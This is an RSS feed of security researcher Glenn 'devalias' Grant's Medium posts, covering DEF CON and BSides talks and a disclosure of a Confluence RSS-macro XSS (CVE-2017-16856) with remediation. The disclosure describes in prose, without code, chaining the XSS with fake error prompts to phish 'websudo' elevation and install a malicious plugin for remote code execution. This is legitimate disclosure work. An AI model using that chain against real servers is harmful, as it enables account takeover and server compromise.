<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Glenn &#39;devalias&#39; Grant on Medium]]></title>
        <description><![CDATA[Stories by Glenn &#39;devalias&#39; Grant on Medium]]></description>
        <link>https://medium.com/@devalias?source=rss-4931d93bca2f------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*tbZyOAVkv3CGR0ClfMg4kA.jpeg</url>
            <title>Stories by Glenn &amp;#39;devalias&amp;#39; Grant on Medium</title>
            <link>https://medium.com/@devalias?source=rss-4931d93bca2f------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Tue, 19 May 2026 09:20:53 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@devalias/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Forming Serverless Clouds with AWS]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://medium.com/@devalias/forming-serverless-clouds-with-aws-cloudformation-sam-cdk-amplify-bd8bb0b00e5a?source=rss-4931d93bca2f------2"><img src="https://cdn-images-1.medium.com/max/2600/0*-NiNwqK6ln-seSNT" width="4455"></a></p><p class="medium-feed-snippet">CloudFormation, SAM, CDK, Amplify</p><p class="medium-feed-link"><a href="https://medium.com/@devalias/forming-serverless-clouds-with-aws-cloudformation-sam-cdk-amplify-bd8bb0b00e5a?source=rss-4931d93bca2f------2">Continue reading on Medium »</a></p></div>]]></description>
            <link>https://medium.com/@devalias/forming-serverless-clouds-with-aws-cloudformation-sam-cdk-amplify-bd8bb0b00e5a?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/bd8bb0b00e5a</guid>
            <category><![CDATA[serverless]]></category>
            <category><![CDATA[aws]]></category>
            <category><![CDATA[infrastructure-as-code]]></category>
            <category><![CDATA[cloudformation]]></category>
            <category><![CDATA[devops]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Fri, 14 Sep 2018 14:00:00 GMT</pubDate>
            <atom:updated>2018-09-15T09:00:44.194Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[Presenting at DEF CON 26 — Bug Bounty Hunting on Steroids]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://medium.com/@devalias/presenting-at-def-con-26-bug-bounty-hunting-on-steroids-df3273c2853a?source=rss-4931d93bca2f------2"><img src="https://cdn-images-1.medium.com/max/1484/1*gwO9-ZkzeoY4Y_zd-eVFNQ.jpeg" width="1484"></a></p><p class="medium-feed-snippet">Wow, what a trip! I just had the opportunity to not only live out a childhood dream of attending DEF CON, but I even had the privilege to&#x2026;</p><p class="medium-feed-link"><a href="https://medium.com/@devalias/presenting-at-def-con-26-bug-bounty-hunting-on-steroids-df3273c2853a?source=rss-4931d93bca2f------2">Continue reading on Medium »</a></p></div>]]></description>
            <link>https://medium.com/@devalias/presenting-at-def-con-26-bug-bounty-hunting-on-steroids-df3273c2853a?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/df3273c2853a</guid>
            <category><![CDATA[infosec]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[automation]]></category>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[defcon]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Sat, 18 Aug 2018 14:00:00 GMT</pubDate>
            <atom:updated>2018-08-19T00:05:05.612Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[DEF CON 2018]]></title>
            <link>https://medium.com/tsscyber/def-con-2018-6ff9542451b8?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/6ff9542451b8</guid>
            <category><![CDATA[red-team]]></category>
            <category><![CDATA[defcon]]></category>
            <category><![CDATA[presentations]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[infosec]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Thu, 09 Aug 2018 01:21:32 GMT</pubDate>
            <atom:updated>2018-08-09T01:24:01.809Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*1s2QBe4kIB3AfINv" /><figcaption>Photo by <a href="https://unsplash.com/@kjpaynter?utm_source=medium&amp;utm_medium=referral">Kirstyn Paynter</a> on <a href="https://unsplash.com?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><p><a href="https://www.tsscyber.com.au/">TSS</a> will be representing in the Las Vegas area for #HackerSummerCamp this year, with a few of our team members speaking at the various InfoSec conventions throughout the week. Drop by our talks or find us somewhere among the sea of InfoSec people and say hi!</p><h4><strong>The Art of Business Warfare</strong></h4><blockquote>Red Teams are designed to penetrate security in a real world test of effectiveness of security controls, policy, technology and infrastructure. Red Teams view security from an adversary perspective in order to simulate realistic attack scenarios that enable an organisation as a whole to prepare and protect against both simply and sophisticated threats. Red Teams build security culture and provide opportunities for staff to be trained using real world examples. During this presentation we will walk through a Red Team Assessment that simulates a state sponsored attack against Executives, and using their access to then test the entire security posture of the organisation from a digital, physical, social and supply chain.</blockquote><p><strong>Who: </strong>Wayne Ronaldson<strong><br>When: </strong><a href="https://www.social-engineer.org/sevillage-def-con/">Friday, August 10th 2018</a><br><strong>Time:</strong> 6:40pm (50min)<br><strong>Where:</strong> <a href="https://www.social-engineer.org/sevillage-def-con/">SEVillage</a>, DEF CON | Octavius 3–8 — Caesars<br><strong>More Information:</strong> <a href="https://www.social-engineer.org/sevillage-def-con/human-track-sevillage/#WR">https://www.social-engineer.org/sevillage-def-con/human-track-sevillage/#WR</a></p><h4>Bug Bounty Hunting on Steroids</h4><blockquote>Bug bounty programs are a hot topic these days. More and more companies are realizing the benefits of running a program, and researchers are jumping at the opportunity to grab some swag and make some extra cash from the bugs they find. Reporting security issues has never been as easy, open, and risk-free as it is right now. Everybody wins!</blockquote><blockquote>Though that doesn’t mean we should stop there. As researchers, we spend a lot of time doing the same menial tasks for each program: monitoring for new targets, checking for common issues, remembering just which flags you needed to pass to that tool (or even which tool is best for that job). We build new tools, hack together shell scripts, and generally make small incremental changes to our process. But surely there’s a better approach? <a href="http://reconvillage.org/talks-2018/#bug-bounty-hunting-on-steroids---anshuman-bhartiya-and-glenn-devalias-grant">(…continued)</a></blockquote><p><strong>Who: </strong><a href="https://twitter.com/_devalias">Glenn ‘devalias’ Grant</a><strong><br>When: </strong><a href="http://reconvillage.org/schedule/">Saturday, August 11th 2018</a><br><strong>Time:</strong> 12:10pm (45min)<br><strong>Where:</strong> <a href="http://reconvillage.org/">Recon Village</a>, DEF CON | Florentine I II — Caesars<br><strong>More Information:</strong> <a href="http://reconvillage.org/talks-2018/#bug-bounty-hunting-on-steroids---anshuman-bhartiya-and-glenn-devalias-grant">http://reconvillage.org/talks-2018/#bug-bounty-hunting-on-steroids---anshuman-bhartiya-and-glenn-devalias-grant</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=6ff9542451b8" width="1" height="1" alt=""><hr><p><a href="https://medium.com/tsscyber/def-con-2018-6ff9542451b8">DEF CON 2018</a> was originally published in <a href="https://medium.com/tsscyber">TSS - Trusted Security Services</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[USB Reverse Engineering: Down the rabbit hole]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-snippet">I tend to dive down rabbit holes a lot, and given the cost of context switching and memory deteriorating over time, sometimes the state I&#x2026;</p><p class="medium-feed-link"><a href="https://medium.com/hackernoon/usb-reverse-engineering-down-the-rabbit-hole-c4809a5b55c4?source=rss-4931d93bca2f------2">Continue reading on HackerNoon.com »</a></p></div>]]></description>
            <link>https://medium.com/hackernoon/usb-reverse-engineering-down-the-rabbit-hole-c4809a5b55c4?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/c4809a5b55c4</guid>
            <category><![CDATA[usb]]></category>
            <category><![CDATA[hardware]]></category>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[diy]]></category>
            <category><![CDATA[reverse-engineering]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Sat, 12 May 2018 14:00:00 GMT</pubDate>
            <atom:updated>2019-04-23T08:58:56.619Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[Imagine a world..]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://medium.com/@devalias/imagine-a-world-f4c47e14501?source=rss-4931d93bca2f------2"><img src="https://cdn-images-1.medium.com/max/2600/0*vR0hdKYwuhs0b0fR" width="4592"></a></p><p class="medium-feed-snippet">Imagine a world driven by the strive for progress, improvement and innovation, rather than fuelled by corporate greed. Ideas and&#x2026;</p><p class="medium-feed-link"><a href="https://medium.com/@devalias/imagine-a-world-f4c47e14501?source=rss-4931d93bca2f------2">Continue reading on Medium »</a></p></div>]]></description>
            <link>https://medium.com/@devalias/imagine-a-world-f4c47e14501?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/f4c47e14501</guid>
            <category><![CDATA[sharing]]></category>
            <category><![CDATA[future]]></category>
            <category><![CDATA[innovation]]></category>
            <category><![CDATA[open-source]]></category>
            <category><![CDATA[futurism]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Thu, 19 Apr 2018 14:00:00 GMT</pubDate>
            <atom:updated>2018-08-01T02:25:01.519Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[DIY Light Therapy]]></title>
            <description><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://medium.com/@devalias/diy-light-therapy-red-infrared-cold-laser-lllt-blue-uv-ebed82e5a211?source=rss-4931d93bca2f------2"><img src="https://cdn-images-1.medium.com/max/2600/0*0bwhyxuZjnVDqP2X" width="4898"></a></p><p class="medium-feed-snippet">(Red/Near Infrared, Cold/Low Level Laser, Blue/UV, etc)</p><p class="medium-feed-link"><a href="https://medium.com/@devalias/diy-light-therapy-red-infrared-cold-laser-lllt-blue-uv-ebed82e5a211?source=rss-4931d93bca2f------2">Continue reading on Medium »</a></p></div>]]></description>
            <link>https://medium.com/@devalias/diy-light-therapy-red-infrared-cold-laser-lllt-blue-uv-ebed82e5a211?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/ebed82e5a211</guid>
            <category><![CDATA[biohacking]]></category>
            <category><![CDATA[wellness]]></category>
            <category><![CDATA[diy]]></category>
            <category><![CDATA[light-therapy]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Fri, 06 Apr 2018 14:00:00 GMT</pubDate>
            <atom:updated>2018-08-01T02:23:17.540Z</atom:updated>
        </item>
        <item>
            <title><![CDATA[Atlassian Confluence: Cross-Site Scripting (XSS) (CVE-2017–16856)]]></title>
            <link>https://medium.com/tsscyber/atlassian-confluence-cross-site-scripting-xss-cve-2017-16856-9c27f6ae576c?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/9c27f6ae576c</guid>
            <category><![CDATA[confluence]]></category>
            <category><![CDATA[atlassian]]></category>
            <category><![CDATA[cve]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[xss-attack]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Mon, 04 Dec 2017 13:00:00 GMT</pubDate>
            <atom:updated>2018-06-26T01:18:57.759Z</atom:updated>
            <content:encoded><![CDATA[<p>Earlier this year I spent some time delving into <a href="https://www.atlassian.com/software/confluence">Atlassian Confluence</a> to see if I could dig up any bugs that had slipped through the cracks. I wasn’t really expecting to turn up much, but I was super excited and surprised when I managed to find an issue within the RSS feed plugin leading to Cross-Site Scripting (XSS) (Twitter: <a href="https://twitter.com/_devalias/status/922234470274498560">1</a>, <a href="https://twitter.com/_devalias/status/938271825414455298">2</a>; LinkedIn: <a href="https://www.linkedin.com/feed/update/urn:li:activity:6328008786355331072/">1</a>, <a href="https://www.linkedin.com/feed/update/urn:li:activity:6344043067401732096">2</a>; BugCrowd: <a href="https://bugcrowd.com/devalias">1</a>, <a href="https://bugcrowd.com/atlassian/hall-of-fame">2</a>).</p><p>Thanks to <a href="https://www.atlassian.com/trust/security">Atlassian</a> and <a href="https://www.bugcrowd.com/">BugCrowd</a> for running an awesome bug bounty program and giving researchers the opportunity to hack things, make the internet safer, AND get rewarded while doing so!</p><h3>The CVE</h3><p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16856"><strong>CVE-2017–16856</strong></a>: The RSS Feed macro in Atlassian Confluence before version 6.5.2 allows remote attackers to inject arbitrary HTML or JavaScript via cross site scripting (XSS) vulnerabilities in various rss properties which were used as links without restriction on their scheme.</p><ul><li><a href="https://jira.atlassian.com/browse/CONFSERVER-54395">Confluence Bug Report (CONFSERVER-54395)</a></li><li><a href="https://confluence.atlassian.com/doc/issues-resolved-in-6-5-2-940701301.html">Confluence — Issues resolved in 6.5.2</a></li><li><a href="http://www.securityfocus.com/bid/102094">SecurityFocus</a></li></ul><h3>Remediation</h3><p>This issue was fixed in Confluence 6.5.2. Update to this version or newer to be protected. See the CVE advisory details for more information.</p><h3>Chaining bugs, social engineering and platform features</h3><p>As part of my PoC, I put together some fun little phishing code using the Confluence web plugin API’s. If there is interest (and I’m allowed), I might share it (and some of the useful features/places to look to build similar) sometime.</p><p>Once XSS is achieved, if the current user isn’t already an ‘elevated’ administrator, the code provides error messages using standard Confluence GUI elements to convince the user to elevate their privileges with ‘websudo’. Once they do that, you can basically abuse their full privileges to create new administrators, or (my favourite) install a small malicious plugin to provide Remote Code Execution (RCE) on the server.</p><p>While these aren’t security issues in themselves, it does show how you can leverage social engineering techniques and other platform features to chain smaller issues into something more powerful and damaging.</p><h3>Acknowledgements</h3><p>These issues were identified by <a href="http://devalias.net/">myself</a> and the team at <a href="https://dtss.com.au/">TSS</a>:</p><ul><li>Glenn ‘devalias’ Grant (<a href="http://devalias.net/">http://devalias.net</a>) of TSS (<a href="https://dtss.com.au/">https://dtss.com.au</a>)</li></ul><h3>Conclusion</h3><p>It pays to look in places less travelled. If there are older features in products, or things that may not be as popular/used as often, try looking in there. Who knows what may have been overlooked.</p><p>Have you ever looked into some popular software and found issues you never expected to find? Got a cool story to share about it? Maybe you’ve chained some bugs in an interesting way, or just want to hear more about my PoC? I’d love to hear from you in the comments below!</p><p><em>Originally published at </em><a href="http://devalias.net/devalias/2017/12/05/atlassian-confluence-cross-site-scripting-xss/"><em>devalias.net</em></a><em> on December 5, 2017.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=9c27f6ae576c" width="1" height="1" alt=""><hr><p><a href="https://medium.com/tsscyber/atlassian-confluence-cross-site-scripting-xss-cve-2017-16856-9c27f6ae576c">Atlassian Confluence: Cross-Site Scripting (XSS) (CVE-2017–16856)</a> was originally published in <a href="https://medium.com/tsscyber">TSS - Trusted Security Services</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Presenting all the things! (BSides Wellington, CSides Canberra, SecTalks Canberra)]]></title>
            <link>https://medium.com/@devalias/presenting-all-the-things-bsides-wellington-csides-canberra-sectalks-canberra-ff3bfec6b79a?source=rss-4931d93bca2f------2</link>
            <guid isPermaLink="false">https://medium.com/p/ff3bfec6b79a</guid>
            <category><![CDATA[workshop]]></category>
            <category><![CDATA[bsides]]></category>
            <category><![CDATA[speakers]]></category>
            <category><![CDATA[bsideswlg]]></category>
            <category><![CDATA[security]]></category>
            <dc:creator><![CDATA[Glenn 'devalias' Grant]]></dc:creator>
            <pubDate>Sat, 18 Nov 2017 13:00:00 GMT</pubDate>
            <atom:updated>2017-12-09T00:04:57.885Z</atom:updated>
            <content:encoded><![CDATA[<p>Recently I had the opportunity to present at a few local security meetups, and one international security conference.</p><p>At the start of 2017, I set a loose goal in the back of my mind that I would like to “get out there more” and “speak about the things I do”. Little did I know at the time that this would actually eventuate; leading to me having a pile of great experiences, and meeting some really cool and talented people!</p><h3>TL;DR</h3><p><a href="http://www.sectalks.org/canberra/"><strong>SecTalks Canberra</strong></a><strong> (</strong><a href="https://www.meetup.com/SecTalks-Canberra/events/241579721/"><strong>November 14th, 2017; Canberra, Australia</strong></a><strong>)</strong></p><ul><li>“Hack FaaSter: Leveraging Docker and OpenFaaS for fun and offensive (security) profit.”</li><li>Slides, workshop, etc: <a href="https://github.com/0xdevalias/hack-FaaSter">GitHub</a> <a href="https://github.com/0xdevalias/hack-FaaSter/blob/master/20171114%20-%20Hack%20FaaSter%20-%20SecTalks%20Canberra.pdf">PDF</a>, <a href="https://speakerdeck.com/0xdevalias/hack-faaster-leveraging-docker-and-openfaas-for-fun-and-offensive-security-profit">SpeakerDeck</a>, <a href="https://www.slideshare.net/GlenndevaliasGrant/hack-faaster-sectalks-canberra-20171114">SlideShare</a></li></ul><p><a href="http://www.bsidesau.com.au/csides.html"><strong>CSides Canberra</strong></a><strong> (November 17th, 2017; Canberra, Australia)</strong></p><ul><li>“Gophers, whales and.. clouds? Oh my!” v0.2-prewlg-alpha</li></ul><p><a href="https://www.bsides.nz/"><strong>BSides Wellington 2017</strong></a><strong> (November 23–24th, 2017; Wellington, New Zealand)</strong></p><ul><li><a href="https://bsideswellington2017.sched.com/speaker/glenndevaliasgrant">Speaker: Glenn ‘devalias’ Grant</a></li><li><a href="https://bsideswellington2017.sched.com/event/CTpF/gophers-whales-and-clouds-oh-my">“Gophers, whales and.. clouds? Oh my!”</a></li><li>Slides, etc: <a href="https://github.com/0xdevalias/gopherblazer">GitHub</a>, <a href="https://github.com/0xdevalias/gopherblazer/blob/master/slides/20171123-Gopherblazer-BSidesWellington.pdf">PDF</a>, <a href="https://speakerdeck.com/0xdevalias/gophers-whales-and-dot-clouds-oh-my">SpeakerDeck</a>, <a href="https://www.slideshare.net/GlenndevaliasGrant/gophers-whales-and-clouds-oh-my">SlideShare</a></li></ul><h3>SecTalks Canberra</h3><p><a href="http://www.sectalks.org/canberra/">SecTalks Canberra</a> is a monthly security meetup with more of a focus on participation and learning from others, rather than the traditional ‘super awesome technical talk but how do I do it’ style of things.</p><p>I had the opportunity to run a little workshop on how to use <a href="https://www.docker.com/">Docker</a> and <a href="https://www.openfaas.com/">OpenFaaS</a> to improve offensive capabilities.</p><blockquote><em>Hack FaaSter: Leveraging Docker and OpenFaaS for fun and offensive (security) profit.</em></blockquote><p>Slides, workshop files and more details are available from the ‘TL;DR’ section above.</p><p>Description:</p><blockquote><em>Join us this month for Hack FaaSter — leveraging </em><a href="https://www.docker.com/"><em>Docker</em></a><em> and </em><a href="https://www.openfaas.com/"><em>OpenFaaS</em></a><em> to improve offensive tooling, with the glorious </em><a href="https://twitter.com/_devalias"><em>@_devalias</em></a><em> (</em><a href="https://github.com/0xdevalias"><em>Github</em></a><em> // </em><a href="https://www.linkedin.com/in/glenn-devalias-grant/"><em>LinkedIn</em></a><em>)</em></blockquote><h3>CSides Canberra</h3><p><a href="http://www.bsidesau.com.au/csides.html">CSides Canberra</a> is a monthly security meetup run by the organisers of <a href="http://www.bsidesau.com.au/">BSides Canberra</a>.</p><p>I had the opportunity to present a v0.2-prewlg-alpha version of my BSides Wellington talk, and get some practice and feedback in before the big thing.</p><blockquote><em>Gophers, whales and.. clouds? Oh my! (v0.2-prewlg-alpha)</em></blockquote><p>Slides and more details are available from the ‘TL;DR’ section above, as well as the BSides Wellington section below.</p><h3>BSides Wellington</h3><p><a href="https://www.bsides.nz/">BSides Wellington</a> (<a href="https://twitter.com/bsideswlg">Twitter</a>) is an annual security conference (based in Wellington, New Zealand) that ran it’s first event in 2017. Popping up to fill the void left by <a href="https://www.kiwicon.org/">Kiwicon</a> (<a href="https://twitter.com/kiwicon">Twitter</a>), they had a strong first event, and hopefully will continue that trend into the future!</p><p>I had the opportunity to present my talk on leveraging DevOps trends and tools (<a href="https://www.docker.com/">Docker</a>, <a href="https://en.wikipedia.org/wiki/Serverless_computing">Serverless</a>, <a href="https://en.wikipedia.org/wiki/Function_as_a_service">FaaS</a>, <a href="https://golang.org/">Golang</a>, etc), to increase my efficiency and effectiveness on the offensive side.</p><blockquote><em>Gophers, whales and.. clouds? Oh my!</em></blockquote><p>Slides and more details are available from the ‘TL;DR’ section above.</p><p>You can read the <a href="https://bsideswellington2017.sched.com/event/CTpF/gophers-whales-and-clouds-oh-my">official brief of my talk</a>:</p><blockquote><em>Go, Docker and Microservices; some great technologies and buzzwords that we hear so much about on the development side of the fence, but how can we leverage these technologies to improve our offensive capacity? Armed with a passion for new tech, a vague theory, and an ‘nsa-o-matic’ approved project name; gopherblazer was born.</em></blockquote><blockquote><em>Whether through dockerising and improving existing tooling, leveraging Function-as-a-Service (FaaS) offerings, or just distributing offensive capabilities; I’ll share what I learned on my journey into improving my offensive capacity and productivity (while having an excuse to play with shiny technologies along the way!).</em></blockquote><p>And I can even now say that I have a <a href="https://bsideswellington2017.sched.com/speaker/glenndevaliasgrant">professional speaker bio</a>:</p><blockquote><em>Glenn ‘devalias’ Grant is a full-stack, polyglot developer with an acute interest in the offensive side of security. Whether building something new or finding the cracks to break in, there is always a solution to be found; even if it requires learning something entirely new. If you can improve/automate something, do it, and if you’ve put the effort in to do so, open-source it and share it with everyone else.</em></blockquote><blockquote><em>When not hacking and coding, Glenn can be found snowboarding the peaks of Japan, falling out of the sky, floating around underwater, or just finding the most efficient path between A and B (even if that’s over walls). Life is short. Do the things you love, embrace the unknown, live your dreams, and share your passion.</em></blockquote><p>Overall, the conference was amazing. As expected, there were a number of deeply interesting technical talks, but as a bit of a twist from traditional security conferences, there were quite a few talks that focussed on mental health, impostor syndrome, and other ‘culture based’ topics that so often go unmentioned in the infosec industry. Very much appreciated and would love to see this sort of thing happen at more conferences in future.</p><p>If you missed the talks, or want to go back and re-watch them, videos should be posted online at some point (once the organisers recover from running the conference). A lot of the presenters also seem to be pushing their slides/content out online. Here’s a selection of the few I’ve stumbled across so far (in no particular order):</p><ul><li><a href="https://github.com/0xdevalias/gopherblazer#talks">Glenn ‘devalias’ Grant, “Gophers, whales and.. clouds? Oh my!”</a>(<a href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/blockquote%20class=%22twitter-tweet%22%3E%3Cp%20lang=%22en%22%20dir=%22ltr%22%3ESlides%20from%20my%20%3Ca%20href=%22https://twitter.com/hashtag/bsideswlg?src=hash&amp;ref_src=twsrc%5Etfw%22%3E#bsideswlg%3C/a%3E%20talk%20are%20now%20pushed%20to%20%3Ca%20href=%22https://twitter.com/speakerdeck?ref_src=twsrc%5Etfw%22%3E@speakerdeck%3C/a%3E%20and%20%3Ca%20href=%22https://twitter.com/SlideShare?ref_src=twsrc%5Etfw%22%3E@SlideShare%3C/a%3E%20for%20your%20viewing%20pleasure.%20See%20links%20at%20%3Ca%20href=%22https://t.co/Iu1UBGhGSa%22%3Ehttps://t.co/Iu1UBGhGSa%3C/a%3E%3C/p%3E—%20Glenn%20/%20devalias%20(@_devalias)%20%3Ca%20href=%22https://twitter.com/_devalias/status/937104594974289920?ref_src=twsrc%5Etfw%22%3EDecember%202,%202017%3C/a%3E%3C/blockquote%3E%0A%3Cscript%20async%20src=%22https://platform.twitter.com/widgets.js%22%20charset=%22utf-8%22%3E%3C/script">Twitter</a>)</li><li><a href="https://speakerdeck.com/barnbarn/layer-2-person-spoofing-and-impostor-syndrome">Ben Hughes, “Layer 2 person spoofing and impostor syndrome”</a>(<a href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/blockquote%20class=%22twitter-tweet%22%3E%3Cp%20lang=%22en%22%20dir=%22ltr%22%3EMy%20slides%20for%20%22Layer%202%20person%20spoofing%20and%20impostor%20syndrome%22%20for%20%3Ca%20href=%22https://twitter.com/hashtag/bsideswlg?src=hash&amp;ref_src=twsrc%5Etfw%22%3E#bsideswlg%3C/a%3E%20are%20up%20at%20%3Ca%20href=%22https://t.co/hAbzSMsLmt%22%3Ehttps://t.co/hAbzSMsLmt%3C/a%3E%20thanks%20everyone%20who%20came%20along.%3C/p%3E—%20Ben%20Hughes%20(@benjammingh)%20%3Ca%20href=%22https://twitter.com/benjammingh/status/933484211977166848?ref_src=twsrc%5Etfw%22%3ENovember%2022,%202017%3C/a%3E%3C/blockquote%3E%0A%3Cscript%20async%20src=%22https://platform.twitter.com/widgets.js%22%20charset=%22utf-8%22%3E%3C/script">Twitter</a>)</li><li><a href="https://speakerdeck.com/heisenburger/design-for-security-bsides-wellington-2017">Serena Chen, “Design for Security — BSides Wellington 2017”</a>(<a href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/blockquote%20class=%22twitter-tweet%22%3E%3Cp%20lang=%22en%22%20dir=%22ltr%22%3E%F0%9F%90%9D%F0%9F%90%9D%F0%9F%90%9D%20hey%20%3Ca%20href=%22https://twitter.com/hashtag/bsideswlg?src=hash&amp;ref_src=twsrc%5Etfw%22%3E#bsideswlg%3C/a%3E%20fam,%20I%20finally%20uploaded%20my%20slides%20from%20my%20design%20for%20security%20talk:%20%3Ca%20href=%22https://t.co/K4wWWeciJM%22%3Ehttps://t.co/K4wWWeciJM%3C/a%3E%20Thanks%20so%20much%20for%20coming%20along!%20%F0%9F%98%8A%3C/p%3E—%20%F0%9F%8C%99%20serena%20chen%20%F0%9F%92%AB%20(@Sereeena)%20%3Ca%20href=%22https://twitter.com/Sereeena/status/935208350207356930?ref_src=twsrc%5Etfw%22%3ENovember%2027,%202017%3C/a%3E%3C/blockquote%3E%0A%3Cscript%20async%20src=%22https://platform.twitter.com/widgets.js%22%20charset=%22utf-8%22%3E%3C/script">Twitter</a>)</li><li><a href="https://mango.pdf.zone/operation-luigi-how-i-hacked-my-friend-without-her-noticing">“Alex”, “Operation Luigi: How I hacked my friend without her noticing”</a> (<a href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/blockquote%20class=%22twitter-tweet%22%3E%3Cp%20lang=%22en%22%20dir=%22ltr%22%3EHey%20everybody%20welcome%20to%20Operation%20Luigi,%20where%20my%20friend%20gave%20me%20permission%20to%20try%20to%20hack%20all%20her%20stuff.%20This%20is%20what%20I%20did,%20how%20I%20did%20it,%20and%20how%20to%20prevent%20it%20from%20working%20on%20you.%20Also%20at%20the%20end%20Mario&#39;s%20good%20green%20brother%20is%20there%3Ca%20href=%22https://t.co/d7CZv9LGm5%22%3Ehttps://t.co/d7CZv9LGm5%3C/a%3E%3C/p%3E%E2%80%94%20%E2%80%9CAlex%E2%80%9D%20(@mangopdf)%20%3Ca%20href=%22https://twitter.com/mangopdf/status/934897549554491394?ref_src=twsrc%5Etfw%22%3ENovember%2026,%202017%3C/a%3E%3C/blockquote%3E%0A%3Cscript%20async%20src=%22https://platform.twitter.com/widgets.js%22%20charset=%22utf-8%22%3E%3C/script">Twitter</a>)</li><li><a href="https://github.com/jenofdoom/give-your-users-better-feedback-about-rubbish-passwords">@jenofdoom, “Give your users better feedback about rubbish passwords with zxcvbn”</a></li><li><a href="https://zxsecurity.co.nz/presentations/201711_BSidesWLG-ZXSecurity_MeatPuppets.pdf">Simon ‘bogan’ Howard, “Influencing Meat Puppets Through Memes”</a> (<a href="http://devalias.net/devalias/2017/11/19/presenting-all-the-things-bsides-wellington-csides-sectalks/blockquote%20class=%22twitter-tweet%22%3E%3Cp%20lang=%22en%22%20dir=%22ltr%22%3EThe%20slides%20from%20my%20%3Ca%20href=%22https://twitter.com/bsideswlg?ref_src=twsrc%5Etfw%22%3E@bsideswlg%3C/a%3E%20presentation%20on%20%22Influencing%20Meat%20Puppets%20with%20Memes%22%20are%20available%20here:%20%3Ca%20href=%22https://t.co/IRWsEmjseE%22%3Ehttps://t.co/IRWsEmjseE%3C/a%3E%3C/p%3E%E2%80%94%20bogan%20(@bogan)%20%3Ca%20href=%22https://twitter.com/bogan/status/934896629135556608?ref_src=twsrc%5Etfw%22%3ENovember%2026,%202017%3C/a%3E%3C/blockquote%3E%0A%3Cscript%20async%20src=%22https://platform.twitter.com/widgets.js%22%20charset=%22utf-8%22%3E%3C/script">Twitter</a>)</li></ul><p>It looks like there are also some good summaries, notes and writeups of the conference popping up around the net. Some places to start looking:</p><ul><li><a href="https://rodger.donaldson.gen.nz/archives/2017/11/b-sides-wellington-day-1/">B-Sides Wellington — Day 1 (Notes)</a> (<a 